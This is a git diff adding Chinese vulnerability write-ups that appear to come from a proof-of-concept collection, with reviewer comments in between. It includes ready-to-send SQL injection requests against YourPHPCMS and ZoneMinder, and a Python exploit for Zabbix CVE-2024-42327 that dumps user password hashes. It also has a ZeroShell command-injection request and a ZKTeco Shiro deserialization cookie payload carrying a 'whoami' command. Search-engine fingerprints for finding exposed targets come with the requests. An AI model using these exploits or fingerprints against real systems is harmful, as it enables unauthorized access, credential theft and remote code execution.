diff --git a/YourPHPCMSRegister_checkEmail存在sql注入漏洞.md b/YourPHPCMSRegister_checkEmail存在sql注入漏洞.md new file mode 100644 index 0000000..35fb7be --- /dev/null +++ b/YourPHPCMSRegister_checkEmail存在sql注入漏洞.md @@ -0,0 +1,30 @@ +# YourPHPCMS Register_checkEmail存在sql注入漏洞 + +# 一、漏洞简介 +<font style="color:rgba(0, 0, 0, 0.84);">YourPHPCMS Register_checkEmail存在sql注入漏洞</font> + +# <font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font> ++ YourPHPCMS + +# 三、资产测绘 +```rust +header="YP_onlineid" +``` + +![1732274823092-2e4e8c5d-0bf0-4096-b2f6-966c88ac1dff.png](./img/Uobm7bh1TOAklZ7N/1732274823092-2e4e8c5d-0bf0-4096-b2f6-966c88ac1dff-887874.png) + +# 四、漏洞复现 +```rust +GET /index.php?g=User&m=Register&a=checkEmail&userid=1&email=-69710348@nwcrb.com'+or+'1'='2" HTTP/1.1 +Host: +Accept: */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Accept-Encoding: gzip, deflate, br, zstd +``` + +![1732274798163-92c86972-4ab2-45b1-8ed0-efdd82c98664.png](./img/Uobm7bh1TOAklZ7N/1732274798163-92c86972-4ab2-45b1-8ed0-efdd82c98664-429686.png) + + + +> 更新: 2024-11-27 10:00:37 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sgms1fg0nfgaavx3> \ No newline at end of file diff --git a/YourPHPCMSlogin_checkEmail存在sql注入漏洞.md b/YourPHPCMSlogin_checkEmail存在sql注入漏洞.md new file mode 100644 index 0000000..d6b8ea3 --- /dev/null +++ b/YourPHPCMSlogin_checkEmail存在sql注入漏洞.md 
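Review bot: in the YourPHPCMS Register_checkEmail hunk the injection payload `email=-69710348@nwcrb.com'+or+'1'='2"` ends with a double quote after the closing single quote that the rest of the expression does not need; confirm it is part of the working payload and not a copy artifact, and say what response distinguishes `'1'='2` from `'1'='1`, since the screenshot is the only oracle given. The same payload with the same trailing quote appears in the login_checkEmail hunk that follows. Also, both the fingerprint and the raw request are fenced as ```rust; `http` (or no language tag) would be accurate.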
@@ -0,0 +1,30 @@ +# YourPHPCMS login_checkEmail存在sql注入漏洞 + +# 一、漏洞简介 +<font style="color:rgba(0, 0, 0, 0.84);">YourPHPCMS login_checkEmail存在sql注入漏洞</font> + +# <font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font> ++ YourPHPCMS + +# 三、资产测绘 +```rust +header="YP_onlineid" +``` + +![1732274946081-2fa7b36f-5b27-464c-899e-b80b63981e17.png](./img/RDkgNNSh_hl5-i_H/1732274946081-2fa7b36f-5b27-464c-899e-b80b63981e17-263714.png) + +# 四、漏洞复现 +```rust +GET /index.php?g=Admin&m=Login&a=checkEmail&userid=1&email=-69710348@nwcrb.com'+or+'1'='2" HTTP/1.1 +Host: +Accept: */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Accept-Encoding: gzip, deflate, br, zstd +``` + +![1732274927301-ad8d704f-9b24-4757-a70a-01095646ed2a.png](./img/RDkgNNSh_hl5-i_H/1732274927301-ad8d704f-9b24-4757-a70a-01095646ed2a-852294.png) + + + +> 更新: 2024-11-27 10:00:37 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/edbg83z8v9qn2mic> \ No newline at end of file diff --git a/YourPHPCMS系统Register_checkEmail存在sql注入漏洞.md b/YourPHPCMS系统Register_checkEmail存在sql注入漏洞.md new file mode 100644 index 0000000..43785af --- /dev/null +++ b/YourPHPCMS系统Register_checkEmail存在sql注入漏洞.md @@ -0,0 +1,21 @@ +# YourPHPCMS系统Register_checkEmail存在sql注入漏洞 +YourPHPCMS login_checkEmail存在sql注入漏洞 + +## fofa +```rust +header="YP_onlineid" +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1732274946081-2fa7b36f-5b27-464c-899e-b80b63981e17.png) + +## poc +```rust +GET /index.php?g=User&m=Register&a=checkEmail&userid=1&email=-69710348@nwcrb.com'+or+'1'='2" HTTP/1.1 +Host: +Accept: */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Accept-Encoding: gzip, deflate, br, zstd +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1732274798163-92c86972-4ab2-45b1-8ed0-efdd82c98664.png) + 
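Review bot: the YourPHPCMS系统Register_checkEmail hunk opens with the line `YourPHPCMS login_checkEmail存在sql注入漏洞` directly under a Register_checkEmail title, so the summary contradicts the heading (a copy-paste from the login file). Beyond that, this file repeats YourPHPCMSRegister_checkEmail.md added earlier in this diff: the same `g=User&m=Register&a=checkEmail` request and the same screenshots, here as cdn.nlark.com URLs instead of ./img paths. Keep one copy, or make one file a pointer to the other, so the two do not drift apart.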
diff --git a/YourPHPCMS系统login_checkEmail存在sql注入漏洞.md b/YourPHPCMS系统login_checkEmail存在sql注入漏洞.md new file mode 100644 index 0000000..cda8975 --- /dev/null +++ b/YourPHPCMS系统login_checkEmail存在sql注入漏洞.md @@ -0,0 +1,21 @@ +# YourPHPCMS系统login_checkEmail存在sql注入漏洞 +YourPHPCMS login_checkEmail存在sql注入漏洞 + +## fofa +```rust +header="YP_onlineid" +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1732274946081-2fa7b36f-5b27-464c-899e-b80b63981e17.png) + +## poc +```rust +GET /index.php?g=Admin&m=Login&a=checkEmail&userid=1&email=-69710348@nwcrb.com'+or+'1'='2" HTTP/1.1 +Host: +Accept: */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Accept-Encoding: gzip, deflate, br, zstd +``` + +![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1732274927301-ad8d704f-9b24-4757-a70a-01095646ed2a.png) + diff --git a/ZKBioSecurity存在shiro反序列漏洞.md b/ZKBioSecurity存在shiro反序列漏洞.md new file mode 100644 index 0000000..edfbecf --- /dev/null +++ b/ZKBioSecurity存在shiro反序列漏洞.md @@ -0,0 +1,19 @@ +# ZKBioSecurity存在shiro反序列漏洞 + +ZKBioSecurity平台存在 shiro 反序列化漏洞,该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据,在服务器上执行任意代码,执行系统命令、或打入内存马等,获取服务器权限。 + +## fofa + +```javascript +title=="ZKBioSecurity" && body="Automatic login within two weeks" +``` + +## poc + +利用工具 + +``` +https://github.com/SummerSec/ShiroAttack2/releases/tag/4.7.0 +``` + +![image-20241106225639218](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411062256286.png) \ No newline at end of file diff --git a/Zabbix存在SQL注入漏洞(CVE-2024-42327).md b/Zabbix存在SQL注入漏洞(CVE-2024-42327).md new file mode 100644 index 0000000..1ea8b79 --- /dev/null +++ b/Zabbix存在SQL注入漏洞(CVE-2024-42327).md 
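Review bot: the YourPHPCMS系统login_checkEmail hunk duplicates YourPHPCMSlogin_checkEmail.md added earlier in this diff (identical `g=Admin&m=Login&a=checkEmail` request, identical payload, the same screenshots via cdn.nlark.com); two files for one finding will diverge on the next edit, so keep a single file.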
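Review bot: the ZKBioSecurity hunk asserts a hard-coded shiro key (`软件存在硬编码的 shiro-key`) but never records the key, and its `poc` section is only a link to the ShiroAttack2 4.7.0 release, so a reader can neither verify the finding nor write a detection without rediscovering the key; add the key, or at least the `rememberMe` probe and what a vulnerable response looks like. Smaller point: the filename and title say `shiro反序列漏洞`, which should read `反序列化`.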
@@ -0,0 +1,185 @@ +# Zabbix SQL注入漏洞(CVE-2024-42327) + +Zabbix 是一款开源的网络监控和报警系统,用于监视网络设备、服务器和应用程序的性能和可用性。 + +Zabbix的addRelatedObjects函数中的CUser类中存在SQL注入,此函数由 CUser.get 函数调用,具有API访问权限的用户可利用造成越权访问高权限用户敏感信息以及执行恶意SQL语句等危害。 + +## 影响版本 + +``` +6.0.0 <= Zabbix <= 6.0.31 +6.4.0 <= Zabbix <= 6.4.16 +Zabbix 7.0.0 +``` + +## poc + +```java +POST /api_jsonrpc.php HTTP/1.1 +Host: +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +Content-Type: application/json-rpc +Content-Length: 106 + +{"jsonrpc": "2.0", "method": "user.login", "params": {"username": "Admin", "password": "zabbix"}, "id": 1} +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412040952671.webp) + +```javascript +POST /api_jsonrpc.php HTTP/1.1 +Host: +Accept-Encoding: gzip, deflate +Accept: */* +Connection: close +Content-Type: application/json-rpc +Content-Length: 167 + +{"jsonrpc": "2.0", "method": "user.get", "params": {"selectRole": ["roleid, u.passwd", "roleid"], "userids": "1"}, "auth": "40b23536324a2e3e872f0f446d7a11d0", "id": 1} +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412040953059.webp) + + + +## python + +```python +import requests +import argparse + +""" +Exploit Script for CVE-2024-42327 +Author: Alejandro Ramos (@aramosf) +Assisted by: ChatGPT +Date: 2024-12-01 + +This script demonstrates the exploitation of the vulnerability CVE-2024-42327, +registered by Zabbix as ZBX-25623. This vulnerability allows unauthorized +access to sensitive user information by abusing the JSON-RPC API. + +References: +- CVE: CVE-2024-42327 +- Zabbix Issue Tracker: https://support.zabbix.com/browse/ZBX-25623 + +Functionality: +1. Logs in to the Zabbix JSON-RPC API to obtain a session token using a valid username and password. +2. Iterates over a range of user IDs (1 to 40), fetching user details for each ID. + +Arguments: +- `-u` or `--url`: The API endpoint URL (e.g., http://192.168.201.128/api_jsonrpc.php). 
+- `-n` or `--username`: The username for authentication. +- `-p` or `--password`: The password for authentication. + +Example: +python script.py -u "http://192.168.201.128/api_jsonrpc.php" -n "aramosf" -p "Hola1234" + +Disclaimer: +This script is provided for educational purposes only. Unauthorized exploitation +of vulnerabilities is illegal and unethical. Use responsibly. +""" + +def main(url, username, password): + # First request: Login to get the session token + headers = { + "Content-Type": "application/json-rpc" + } + login_data = { + "jsonrpc": "2.0", + "method": "user.login", + "params": { + "username": username, + "password": password + }, + "id": 1 + } + + # Make the POST request for login + response = requests.post(url, json=login_data, headers=headers) + + # Check if the login was successful + if response.status_code == 200: + login_result = response.json() + auth_token = login_result.get("result") # Extract the session token + + if auth_token: + print(f"Valid session token: {auth_token}") + + # Loop over user IDs from 1 to 40 + for userid in range(1, 41): + user_data = { + "jsonrpc": "2.0", + "method": "user.get", + "params": { + "selectRole": ["roleid, u.passwd", "roleid"], + "userids": str(userid) # Convert the user ID to a string + }, + "auth": auth_token, + "id": 1 + } + + # Make the POST request for each user ID + user_response = requests.post(url, json=user_data, headers=headers) + + if user_response.status_code == 200: + user_result = user_response.json() + + # Process the response to extract the desired fields + if "result" in user_result and user_result["result"]: + for user in user_result["result"]: + username = user.get("username", "N/A") + name = user.get("name", "N/A") + surname = user.get("surname", "N/A") + user_id = user.get("userid", "N/A") + role_passwd = user.get("role", {}).get("passwd", "N/A") + + # Print only the requested fields, separated by commas + print(f"{username}, {name}, {surname}, {user_id}, {role_passwd}") + else: + 
print(f"Error in the request for user ID {userid}: {user_response.status_code}") + print(user_response.text) + else: + print("Unable to retrieve a session token.") + else: + print(f"Error in login request: {response.status_code}") + print(response.text) + + +if __name__ == "__main__": + # Parse command-line arguments + parser = argparse.ArgumentParser( + description=( + "Exploit script for CVE-2024-42327 (Zabbix vulnerability ZBX-25623). " + "Use to fetch user details from a Zabbix JSON-RPC API." + ) + ) + parser.add_argument("-u", "--url", required=True, help="The API endpoint URL.") + parser.add_argument("-n", "--username", required=True, help="The username for authentication.") + parser.add_argument("-p", "--password", required=True, help="The password for authentication.") + parser.add_argument( + "--example", action="store_true", help="Show an example usage of the script." + ) + + args = parser.parse_args() + + # Display example usage if --example is passed + if args.example: + print( + "Example:\n" + "python script.py -u \"http://192.168.201.128/api_jsonrpc.php\" -n \"aramosf\" -p \"Hola1234\"" + ) + else: + # Run the main function with the provided arguments + main(args.url, args.username, args.password) + +``` + + + +## 漏洞来源 + +- https://github.com/aramosf/cve-2024-42327 +- https://mp.weixin.qq.com/s/H5KxVfdtAofcR1mC8IYqTw +- https://mp.weixin.qq.com/s/Bfo-aZrVsNmOMtoONBpLzg \ No newline at end of file diff --git a/ZeroShell3.9.0远程命令执行漏洞(CVE-2019-12725).md b/ZeroShell3.9.0远程命令执行漏洞(CVE-2019-12725).md new file mode 100644 index 0000000..7eeab35 --- /dev/null +++ b/ZeroShell3.9.0远程命令执行漏洞(CVE-2019-12725).md 
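Review bot: in the Zabbix hunk the Python script declares `--example` but also marks `-u`, `-n` and `-p` as `required=True`, so `python script.py --example` exits with a usage error before the example branch is ever reached; either drop `required=True` and check the three arguments manually, or remove the flag and leave the example in the docstring. The description also inverts the location (`addRelatedObjects函数中的CUser类`): the injection is in the `addRelatedObjects` method of the `CUser` class, reached through `user.get` via the `selectRole` parameter that the PoC abuses. Minor: the two raw requests are fenced ```java and ```javascript, and the second carries a fixed `auth` value that only makes sense as the output of the first request.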
@@ -0,0 +1,37 @@ +# ZeroShell 3.9.0 远程命令执行漏洞(CVE-2019-12725) + +# 一、漏洞简介 +Zeroshell是一个微型的linux发行版本,它功能强大,具有强大的router、radius、web门户、防火墙、virtual**、Qos、 DHCP、dns转发等功能,可以用来安装到服务器上为内网提供网络服务。ZeroShell 3.9.0 存在命令执行漏洞,/cgi-bin/kerbynet 页面,x509type 参数过滤不严格,导致攻击者可执行任意命令。 + +# 二、影响版本 ++ ZeroShell < 3.9.0 + +# 三、资产测绘 ++ hunter`app.name="ZeroShell"` ++ 特征 + +![1700238326883-4aa88d39-2cd9-4a09-bf76-20df4b3c1e85.png](./img/Qk7FY11KBJGYROTD/1700238326883-4aa88d39-2cd9-4a09-bf76-20df4b3c1e85-616604.png) + +# 四、漏洞复现 +```plain +GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27 HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` + +![1700238420978-583c020a-3c1f-4fe5-8518-a7752c20d39c.png](./img/Qk7FY11KBJGYROTD/1700238420978-583c020a-3c1f-4fe5-8518-a7752c20d39c-022453.png) + + + +> 更新: 2024-02-29 23:57:12 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cwidw8o3h26689ls> \ No newline at end of file diff --git a/Zkteco百傲瑞达安防管理系统平台存在shiro反序列化漏洞.md b/Zkteco百傲瑞达安防管理系统平台存在shiro反序列化漏洞.md new file mode 100644 index 0000000..f09a7b4 --- /dev/null +++ b/Zkteco百傲瑞达安防管理系统平台存在shiro反序列化漏洞.md 
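Review bot: the ZeroShell hunk is inconsistent about the affected release: the title and the `漏洞简介` say `ZeroShell 3.9.0 存在命令执行漏洞`, while `影响版本` says `ZeroShell < 3.9.0`, which would exclude the very version the PoC is written against; CVE-2019-12725 is reported against 3.9.0, so the list should read `ZeroShell <= 3.9.0` or simply `3.9.0`. Also `virtual**` in the product description looks like a filtered word and should be spelled out.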
@@ -0,0 +1,34 @@ +# Zkteco百傲瑞达安防管理系统平台存在shiro反序列化漏洞 + +# 一、漏洞简介 +Zkteco 百傲瑞达安防管理系统平台存在 shiro 反序列化漏洞,该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据,在服务器上执行任意代码,执行系统命令、或打入内存马等,获取服务器权限。 + +# 二、影响版本 ++ Zkteco 百傲瑞达安防管理系统平台 + +# 三、资产测绘 ++ fofa`app="ZKTECO-百傲瑞达安防管理系统平台" && title!="TimeTec Cloud AWDMS" && region="Sichuan"` ++ 特征 + +![1702352620272-12a3898b-2866-434c-885f-754e214f8f53.png](./img/s6nWcxCRIR5Dn46Q/1702352620272-12a3898b-2866-434c-885f-754e214f8f53-977729.png) + +# 四、漏洞复现 +```plain +GET / HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Cmd: whoami +Cookie: rememberMe=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 +Accept-Encoding: gzip +``` + +![1702352669375-ed7bda99-7ba8-4437-937a-8fb896c3d529.png](./img/s6nWcxCRIR5Dn46Q/1702352669375-ed7bda99-7ba8-4437-937a-8fb896c3d529-930942.png) + +[LiquanKit.zip](https://www.yuque.com/attachments/yuque/0/2024/zip/1622799/1709222231764-3ceae87e-b392-4122-8a14-0f027c956689.zip) + +![1702352745177-9df046ec-c019-4e14-8376-23709ef9f9d1.png](./img/s6nWcxCRIR5Dn46Q/1702352745177-9df046ec-c019-4e14-8376-23709ef9f9d1-771497.png) + + + +> 更新: 2024-02-29 23:57:12 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cqpwl2rg9oco0hgf> \ No newline at end of file diff --git a/ZoneMinderindex存在SQL注入漏洞.md b/ZoneMinderindex存在SQL注入漏洞.md new file mode 100644 index 0000000..4a31365 --- /dev/null +++ b/ZoneMinderindex存在SQL注入漏洞.md @@ -0,0 +1,28 @@ +# ZoneMinder index存在SQL注入漏洞 + +# 一、漏洞简介 +ZoneMinder index存在SQL注入漏洞 + +# 二、影响版本 ++ ZoneMinder + +# 三、资产测绘 +```plain +app="ZoneMinder" +``` + +![1723565739853-847ffea8-1b37-4464-8fc9-d7eb118b9464.png](./img/9-95EQiI1gJfYq-3/1723565739853-847ffea8-1b37-4464-8fc9-d7eb118b9464-900395.png) + +# 四、漏洞复现 +```plain +GET /zm/index.php?sort=**if(now()=sysdate()%2Csleep(6)%2C0)**&order=desc&limit=20&view=request&request=watch&mid=1 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +``` + + + + + +> 更新: 2024-09-05 23:21:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gore50bddk9vgsxg> \ No newline at end of file diff --git a/ZoneMinder系统sort接口存在SQL注入漏洞.md 